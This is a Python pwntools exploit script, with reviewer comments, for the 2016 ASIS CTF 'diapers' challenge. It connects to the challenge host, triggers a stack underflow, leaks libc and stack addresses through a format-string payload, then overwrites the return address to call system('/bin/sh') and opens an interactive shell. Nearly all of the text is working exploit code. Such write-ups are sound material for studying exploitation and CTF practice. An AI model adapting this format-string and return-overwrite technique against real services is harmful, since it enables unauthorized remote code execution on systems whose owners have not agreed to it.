2016 ASIS CTF — diapers (exploit only)
by St1tch
from pwn import *
import stitch
# Module-level connection setup: this runs at import time, so merely importing
# the file opens a socket.  With ``local = False`` (as committed) the script
# always talks to the CTF host; the ``local`` branch also uses ``remote``,
# presumably against a copy of the service listening on localhost:9988 -- verify.
local = False
if local :
    s = remote('localhost', 9988)
else :
    s = remote('diapers.asis-ctf.ir', 1343)
# NOTE(review): the source is unindented, so whether raw_input() belongs to the
# else branch or to module level cannot be recovered; module level is assumed.
# It blocks until Enter is pressed before main() starts (Python 2 builtin).
raw_input()
def main() :
    """Drive the remote 'diapers' service over the module-level connection ``s``.

    Three phases, each announced through the pwntools progress logger ``p``:
    (1) send menu choices to reach the state the original comment calls a
    "stack underflow", (2) read back two pointer values from a format-string
    response and derive addresses from them with the local ``stitch`` module,
    (3) send a second payload built by ``stitch.fsb`` and drop to an
    interactive session.

    Depends on names outside this block: ``s`` (connection), ``log``, ``sleep``
    (pwntools) and ``stitch.find_libc`` / ``stitch.fsb`` (project-local; their
    exact contracts are not visible here).  Every send/recv is order-dependent,
    so the statements must stay in this sequence.
    """
    # NOTE(review): str.strip('0x') removes any run of '0' or 'x' characters
    # from BOTH ends, not just a leading '0x' prefix, so a leaked value ending
    # in '0' loses trailing digits.  Documented only; behaviour left as-is.
    strip_ = lambda x : x.strip('0x')
    p = log.progress('start pwning....')
    p.status('select first')
    #to stack underflow
    s.recvuntil('> ')
    s.sendline('3')
    # 257 iterations of menu option '1'; ``_`` is reused as the counter for the
    # status message.  The 0.1 s pause between sends is presumably to avoid
    # outrunning the service -- not verifiable from here.
    for _ in range(257) :
        p.status('%dth minus'%(_+1))
        s.recvuntil('> ')
        sleep(0.1)
        s.sendline('1')
    #find memory addr
    p.status('leak libc and stack')
    s.recvuntil('> ')
    s.sendline('0')
    s.recvuntil('change to: ')
    # Payload is padded to exactly 108 bytes; the two '%N$p' conversions are
    # echoed back by the service and split out on '#' below.
    pay = 'a' * 15
    pay += '#%55$p#%6$p#'
    pay += 'A' * (108 - len(pay))
    s.sendline(pay)
    s.recvuntil('> ')
    s.sendline('2')
    # Fields [1] and [2] of the '#'-split reply are the two pointer strings.
    libc_leak, ret_addr = map(strip_, s.recvuntil('> ').split('#')[1:3])
    # 156 is an empirical offset from the leaked stack value to the target
    # slot; its derivation is not shown on this page.
    ret_addr = int(ret_addr, 16) - 156
    #find func addr
    p.status('find system and binsh')
    # find_libc is keyed on the low three hex digits of the leak (page-offset
    # match, presumably); it returns a list and the first hit is taken.
    libc = stitch.find_libc({'main_ret':libc_leak[-3:]})[0]
    offset = int(libc_leak, 16) - libc['main_ret']
    system = offset + libc['system']
    binsh = offset + libc['binsh']
    #memory overwrite
    p.status('overwrite memory')
    s.sendline('0')
    s.recvuntil('change to: ')
    # Second payload, same 15-byte prefix and 108-byte total length as above;
    # stitch.fsb builds the format-string body from the {address: value} map.
    pay = 'A' * 15
    pay += stitch.fsb(18,{ret_addr:system, ret_addr+8:binsh}, 0)
    pay += 'A' * (108 - len(pay))
    s.sendline(pay)
    s.recvuntil('> ')
    s.sendline('2')
    #success
    p.success('Good!')
    log.success('Get shell!!')
    s.interactive()
# Entry guard: run the exploit driver only when executed as a script, not
# on import (the connection above is still opened at import time).
if __name__ == "__main__":
    main()